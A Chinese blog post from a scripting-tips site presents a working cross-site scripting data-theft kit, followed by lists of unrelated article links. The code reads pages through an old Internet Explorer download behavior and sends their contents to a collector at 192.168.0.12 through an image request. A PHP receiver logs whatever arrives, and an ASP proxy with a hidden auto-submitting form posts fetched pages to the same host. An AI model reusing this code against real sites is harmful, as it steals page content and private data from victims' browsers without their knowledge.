xss文件页面内容读取(解决)


Posted in Javascript onNovember 28, 2010

js:

document.body.addBehavior("#default#Download"); 
var mycars = new Array(); 
mycars[0] = "l.htm"; 
mycars[1] = "y.htm"; 
for (x in mycars ) 
{ 
if(document.body.startDownload(mycars[x],GetData)){ 
GetData(source); 
} 
} function GetData(source) 
{ 
txt=escape(source); 
getReaded(txt); 
} 
function getReaded(usr) { 
var newimg = new Image(); 
newimg.src="http://192.168.0.12/style.php?key="+"\n"+"\n"+usr+"\n"+"\n"; 
}

php:

<?php 
header('Content-Type:text/html;charset=GB2312'); 
function unescape($str) { 
$str = rawurldecode($str); 
preg_match_all("/%u.{4}|&#x.{4};|&#\d+;|.+/U",$str,$r); 
$ar = $r[0]; 
foreach($ar as $k=>$v) { 
if(substr($v,0,2) == "%u") 
$ar[$k] = iconv("UCS-2","UTF-8",pack("H4",substr($v,-4))); 
elseif(substr($v,0,3) == "&#x") 
$ar[$k] = iconv("UCS-2","UTF-8",pack("H4",substr($v,3,-1))); 
elseif(substr($v,0,2) == "&#") { 
$ar[$k] = iconv("UCS-2","UTF-8",pack("n",substr($v,2,-1))); 
} 
} 
return join("",$ar); 
} 
$file="news.html"; 
$_GET['key']=unescape($_GET['key']); 
fputs(fopen($file,'a+'),$_GET['key']); 
?>

=================================================以下通用了===============
<% 
Response.Buffer = True 
Dim sUrlB,send(2) 
send(0)=escape(PageWebProxy("http://192.168.0.5/sohu.htm")) 
send(1)=escape(PageWebProxy("http://192.168.0.5/c.htm")) 
function PageWebProxy(xmlpath) 
Dim i, re, Url, Html 
Url = xmlpath Set re = New RegExp 
re.IgnoreCase = True 
re.Global = True 
sUrlB = Url 
Html = getHTTPPage(Url) 
Url = Left(Url, InStrRev(Url, "/")) 
i = InStr(sUrlB, "?") 
If i > 0 Then 
sUrlB = Left(sUrlB, i - 1) 
End If 
re.Pattern = "(href|action)=(\'|"")?(\?)" 
Html = re.Replace(Html,"$1=$2" & sUrlB & "?") 
re.Pattern = "(src|action|href)=(\'|"")?((http|https|javascript):[A-Za-z0-9\./=\?%\-&_~`@[\]\':+!]+([^<>""])+)(\'|"")?" 
Html = re.Replace(Html,"$1x=$2$3$2") 
re.Pattern = "(window\.open|url)\((\'|"")?((http|https):(\/\/|\\\\)[A-Za-z0-9\./=\?%\-&_~`@[\]:+!]+([^\'<>""])+)(\'|"")?\)" 
Html = re.Replace(Html,"$1x($2$3$2)") 
re.Pattern = "(src|action|href|background)=(\'|"")?([^\/""\'][A-Za-z0-9\./=\?%\-&_~`@[\]:+!]+([^\'<>""])+)(\'|"")?" 
Html = re.Replace(Html,"$1=$2" & Url & "$3$2") 
re.Pattern = "(src|action|href|background)=(\'|"")?\/([^""\'][A-Za-z0-9\./=\?%\-&_~`@[\]:+!]+([^\'<>""])+)(\'|"")?" 
Html = re.Replace(Html,"$1=$2http://" & Split(Url, "/")(2) & "/$3$2") 
re.Pattern = "(src|action|href)=(\'|"")?\/(\'|"")?" 
Html = re.Replace(Html,"$1=$2http://" & Split(Url, "/")(2) & "/$2") 
re.Pattern = "(window\.open|url)\((\'|"")?([^\/""\'http:][A-Za-z0-9\./=\?%\-&_~`@[\]+!]+([^\'<>""])+)(\'|"")?\)" 
Html = re.Replace(Html,"$1($2" & Url & "$3$2)") 
re.Pattern = "(window\.open|url)\((\'|"")?\/([^""\'http:][A-Za-z0-9\./=\?%\-&_~`@[\]+!]+([^\'<>""])+)(\'|"")?\)" 
Html = re.Replace(Html,"$1($2http://" & Split(Url, "/")(2) & "/$3$2)") 
Html = Replace(Html, "&", "%26") 
If Split(Url, "/")(2) = "club.isso.com.cn" Then 
Html = Replace(Html, "%26amp;", "%26") 
Else 
Html = Replace(Html, "%26amp;", "&") 
End If 
Html = Replace(Html, "%26nbsp;", " ") 
Html = Replace(Html, "%26lt;", "<") 
Html = Replace(Html, "%26gt;", ">") 
Html = Replace(Html, "%26quot;", """) 
Html = Replace(Html, "%26copy;", "©") 
Html = Replace(Html, "%26reg;", "®") 
Html = Replace(Html, "%26raquo;", "»") 
Html = Replace(Html, "%26%26", "&&") 
Html = Replace(Html, "%26#", "&#") 
' Html = Replace(Html, "%26", "") 
re.Pattern = "(src|action|href)x=(\'|"")?((http|https|javascript):[A-Za-z0-9\./=\?%\-&_~`@[\]\':+!]+([^<>""])+)(\'|"")?" 
Html = re.Replace(Html,"$1=$2$3$2") 
re.Pattern = "((http|https):(\/\/|\\\\)[A-Za-z0-9\./=\?%\-&_~`@[\]\':+!]+([^<>""])+)" '"(gif|jpg|bmp|png))" 
Html = re.Replace(Html,"?url=$1") 
re.Pattern = "\?url=" & Url & "(#|javascript:)" 
Html = re.Replace(Html,"$1") 
re.Pattern = "multipart\/form-data" 
Html = re.Replace(Html,"") 
PageWebProxy=Html 
End function 
Function getHTTPPage(url) 
Dim Http, theStr, fileExt 
Set Http = Server.CreateObject("MSXML2.XMLHTTP") 
If Request.Form.Count > 0 Then 
For Each x In Request.Form 
theStr = theStr & Server.UrlEncode(x) & "=" & Server.UrlEncode(Request.Form(x)) & "&" 
Next 
Http.Open "POST", url, False 
Http.SetRequestHeader "CONTENT-TYPE", "application/x-www-form-urlencoded" 
Http.Send(theStr) 
Else 
Http.Open "GET", url, False 
Http.Send() 
End If 
If Http.readystate<>4 then Exit Function 
fileExt = LCase(Mid(url, InStrRev(url, ".") + 1)) 
If InStr("$jpg$gif$bmp$png$js$", "$" & fileExt & "$") > 0 Then 
Response.Clear 
Response.BinaryWrite Http.responseBody 
Response.End() 
Else 
If InStr("$rar$mdb$zip$exe$com$ico$", "$" & fileExt & "$") > 0 Then 
Response.AddHeader "Content-Disposition", "Attachment; Filename=" & Mid(sUrlB, InStrRev(sUrlB, "/") + 1) 
Response.BinaryWrite Http.responseBody 
Response.Flush 
Else 
getHTTPPage = bytesToBSTR(Http.responseBody, "GB2312") 
End If 
End If 
Set Http = Nothing 
End Function 
Function BytesToBstr(body,Cset) 
Dim objstream 
Set objstream = Server.CreateObject("adodb.stream") 
objstream.Type = 1 
objstream.Mode =3 
objstream.Open 
objstream.Write body 
objstream.Position = 0 
objstream.Type = 2 
objstream.Charset = Cset 
BytesToBstr = objstream.ReadText 
objstream.Close 
Set objstream = nothing 
End Function 
%> 
document.writeln("<iframe name=\"mimi\" src=about:blank style=display:none><\/iframe>") 
document.writeln("<form id=form action=http:\/\/192.168.0.12\/xss.asp method=POST target=mimi>"); 
document.writeln("<input id=var name=var type=hidden>"); 
document.writeln("<input id=vartwo name=vartwo type=hidden>"); 
document.writeln("<input type=submit style=display:none>"); 
document.writeln("<\/form>") 
document.getElementById("var").value ='http://192.168.0.5/sohu.htm'+unescape('<%=send(0)%>'); 
document.getElementById("vartwo").value ='http://192.168.0.5/c.htm'+unescape('<%=send(1)%>'); 
document.getElementById("form").submit();
Javascript 相关文章推荐
js简单实现标签云效果实例
Aug 06 Javascript
JavaScript 2048 游戏实例代码(简单易懂)
Mar 25 Javascript
Node.js DES加密的简单实现
Jul 07 Javascript
Jquery获取当前城市的天气信息
Aug 05 Javascript
关于AngularJs数据的本地存储详解
Jan 20 Javascript
原生JS与jQuery编写简单选项卡
Oct 30 jQuery
vue代码分割的实现(codesplit)
Nov 13 Javascript
Vue组件间通信方法总结(父子组件、兄弟组件及祖先后代组件间)
Apr 17 Javascript
小程序中英文混合排序问题解决
Aug 02 Javascript
layui+SSM的数据表的增删改实例(利用弹框添加、修改)
Sep 27 Javascript
js实现简单的打印表格
Jan 15 Javascript
为什么推荐使用JSX开发Vue3
Dec 28 Vue.js
用js来解决ajax读取页面乱码
Nov 28 #Javascript
window.name代替cookie的实现代码
Nov 28 #Javascript
在一个js文件里远程调用jquery.js会在ie8下的一个奇怪问题
Nov 28 #Javascript
一个网马的tips实现分析
Nov 28 #Javascript
JQUBAR1.1 jQuery 柱状图插件发布
Nov 28 #Javascript
为jQuery增加join方法的实现代码
Nov 28 #Javascript
Jquery拖拽并简单保存的实现代码
Nov 28 #Javascript
You might like
php ctype函数中文翻译和示例
2014/03/21 PHP
php简单实现批量上传图片的方法
2016/05/09 PHP
php+ajax实现带进度条的上传图片功能【附demo源码下载】
2016/09/14 PHP
不用MOUSEMOVE也能滑动啊
2007/05/23 Javascript
零基础学JavaScript最新动画教程+iso光盘下载
2008/01/22 Javascript
Javascript 设计模式(二) 闭包
2010/05/26 Javascript
jQuery实现表头固定效果的实例代码
2013/05/24 Javascript
使用时间戳解决ie缓存的问题
2014/08/20 Javascript
javascript正则表达式参数/g与/i及/gi的使用指南
2014/08/27 Javascript
jQuery预加载图片常用方法
2015/06/15 Javascript
jQuery实现带有洗牌效果的动画分页实例
2015/08/31 Javascript
AngularJS整合Springmvc、Spring、Mybatis搭建开发环境
2016/02/25 Javascript
JavaScript将base64图片转换成formData并通过AJAX提交的实现方法
2016/10/24 Javascript
jQuery 选择符详细介绍及整理
2016/12/02 Javascript
vue实现nav导航栏的方法
2017/12/13 Javascript
nodeJs实现基于连接池连接mysql的方法示例
2018/02/10 NodeJs
Angular6笔记之封装http的示例代码
2018/07/27 Javascript
vue组件表单数据回显验证及提交的实例代码
2018/08/30 Javascript
Vue中android4.4不兼容问题的解决方法
2018/09/04 Javascript
Vue触发式全局组件构建的方法
2018/11/28 Javascript
你或许不知道的一些npm实用技巧
2019/07/04 Javascript
iview实现图片上传功能
2020/06/29 Javascript
JavaScript本地储存:localStorage、sessionStorage、cookie的使用
2020/10/13 Javascript
Python判断文件和字符串编码类型的实例
2017/12/21 Python
python队列Queue的详解
2019/05/10 Python
PyQt5 在label显示的图片中绘制矩形的方法
2019/06/17 Python
小 200 行 Python 代码制作一个换脸程序
2020/05/12 Python
CSS3 text shadow字体阴影效果
2016/01/08 HTML / CSS
苹果台湾官网:Apple台湾
2019/01/05 全球购物
铁路安全事故反思
2014/04/26 职场文书
求职信范文大全
2014/05/26 职场文书
低碳环保口号
2014/06/12 职场文书
python实现socket简单通信的示例代码
2021/04/13 Python
浅谈pytorch中stack和cat的及to_tensor的坑
2021/05/20 Python
日本动漫十大公认神作:第五现已全网禁播,《死亡笔记》在榜
2022/03/18 日漫
高并发下Redis如何保持数据一致性(避免读后写)
2022/03/18 Redis